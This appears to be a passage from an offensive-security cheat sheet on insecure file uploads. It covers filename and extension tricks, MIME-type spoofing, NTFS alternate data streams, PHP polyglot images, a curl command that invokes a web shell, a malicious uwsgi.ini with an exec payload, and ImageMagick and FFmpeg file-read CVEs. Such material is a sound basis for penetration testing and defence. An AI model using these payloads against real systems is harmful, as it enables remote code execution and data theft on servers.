> Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.
* Use reverse double extension (useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php will execute code): `.php.jpg`
* Random uppercase and lowercase : `.pHp, .pHP5, .PhAr`
MIME type, a MIME type (Multipurpose Internet Mail Extensions type) is a standardized identifier that tells browsers, servers, and applications what kind of file or data is being handled. It consists of a type and a subtype, separated by a slash. Change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif` to disguise the content as an image.
* Set the `Content-Type` twice, once for unallowed type and once for allowed.
[Magic Bytes](https://en.wikipedia.org/wiki/List_of_file_signatures) - Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application.
Using NTFS alternate data stream (ADS) in Windows.
In this case, a colon character ":" will be inserted after a forbidden extension and before a permitted one. As a result, an empty file with the forbidden extension will be created on the server (e.g. "`file.asax:.jpg`"). This file might be edited later using other techniques such as using its short filename. The "::$data" pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. "`file.asp::$data.`")
**Other Techniques**:
PHP web shells don't always have the `<?php` tag, here are some alternatives:
* Using a PHP script tag `<script language="php">`
* The `<?=` is shorthand syntax in PHP for outputting values. It is equivalent to using `<?php echo`.
Create valid pictures hosting PHP code. Upload the picture and use a **Local File Inclusion** to execute the code. The shell can be called with the following command : `curl 'http://localhost/test.php?0=system' --data "1='ls'"`.
* Picture Metadata, hide the payload inside a comment tag in the metadata.
* Picture Resize, hide the payload within the compression algorithm in order to bypass a resize. Also defeating `getimagesize()` and `imagecreatefromgif()`.
* [JPG](https://virtualabs.fr/Nasty-bulletproof-Jpegs-l): use createBulletproofJPG.py
* [PNG](https://blog.isec.pl/injection-points-in-popular-image-formats/): use createPNGwithPLTE.php
* [GIF](https://blog.isec.pl/injection-points-in-popular-image-formats/): use createGIFwithGlobalColorTable.php
* PHP server, take a look at the [.htaccess](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20Apache%20.htaccess) trick to execute code.
* ASP server, take a look at the [web.config](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config) trick to execute code.
* uWSGI server, take a look at the [uwsgi.ini](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20uwsgi.ini/uwsgi.ini) trick to execute code.
The `AddType` directive in an `.htaccess` file is used to specify the MIME (Multipurpose Internet Mail Extensions) type for different file extensions on an Apache HTTP Server. This directive helps the server understand how to handle different types of files and what content type to associate with them when serving them to clients (such as web browsers).
uWSGI configuration files can include “magic” variables, placeholders and operators defined with a precise syntax. The ‘@’ operator in particular is used in the form of @(filename) to include the contents of a file. Many uWSGI schemes are supported, including “exec” - useful to read from a process’s standard output. These operators can be weaponized for Remote Command Execution or Arbitrary File Write/Read when a .ini configuration file is parsed:
Example of a malicious `uwsgi.ini` file:
; read from a symbol
foo = @(sym://uwsgi_funny_function)
; read from binary appended data
bar = @(data://[REDACTED])
; read from http
test = @(http://[REDACTED])
; read from a file descriptor
content = @(fd://[REDACTED])
; read from a process stdout
body = @(exec://whoami)
; call a function returning a char *
characters = @(call://uwsgi_func)
When the configuration file will be parsed (e.g. restart, crash or autoreload) payload will be executed.
CVE-2022-44268 is an information disclosure vulnerability identified in ImageMagick. An attacker can exploit this by crafting a malicious image file that, when processed by ImageMagick, can disclose information from the local filesystem of the server running the vulnerable version of the software.
More payloads in the folder `Picture ImageMagick/`.
### CVE - FFMpeg HLS
FFmpeg is an open source software used for processing audio and video formats. You can use a malicious HLS playlist inside an AVI video to read arbitrary files.
* [A New Vector For “Dirty” Arbitrary File Write to RCE - Doyensec - Maxence Schmitt and Lorenzo Stella - 28 Feb 2023](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)
* [Attacking Webservers Via .htaccess - Eldar Marcussen - May 17, 2011](http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html)
* [BookFresh Tricky File Upload Bypass to RCE - Ahmed Aboul-Ela - November 29, 2014](http://web.archive.org/web/20141231210005/https://secgeek.net/bookfresh-vulnerability/)
* [Insomnihack Teaser 2019 / l33t-hoster - Ian Bouchard (@Corb3nik) - January 20, 2019](http://corb3nik.github.io/blog/insomnihack-teaser-2019/l33t-hoster)
* [Inyección de código en imágenes subidas y tratadas con PHP-GD - hackplayers - March 22, 2020](https://www.hackplayers.com/2020/03/inyeccion-de-codigo-en-imagenes-php-gd.html)
* [La PNG qui se prenait pour du PHP - Philippe Paget (@PagetPhil) - February, 23 2014](https://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/)
* [More Ghostscript Issues: Should we disable PS coders in policy.xml by default? - Tavis Ormandy - 21 Aug 2018](http://openwall.com/lists/oss-security/2018/08/21/2)
* [PHDays - Attacks on video converters:a year later - Emil Lerner, Pavel Cheremushkin - December 20, 2017](https://docs.google.com/presentation/d/1yqWy_aE3dQNXAhW8kxMxRqtP7qMHaIfMzUDpEqFneos/edit#slide=id.p)